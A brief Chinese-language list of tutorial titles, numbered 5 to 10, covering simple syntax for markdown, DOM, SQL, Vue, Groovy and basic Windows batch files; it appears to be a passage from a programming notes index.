- 5. markdown 簡單語法
- 6. DOM簡單語法
- 7. sql 簡單語法
- 8. vue 簡單語法
- 9. groovy簡單語法
- 10. 簡單Bat文件編寫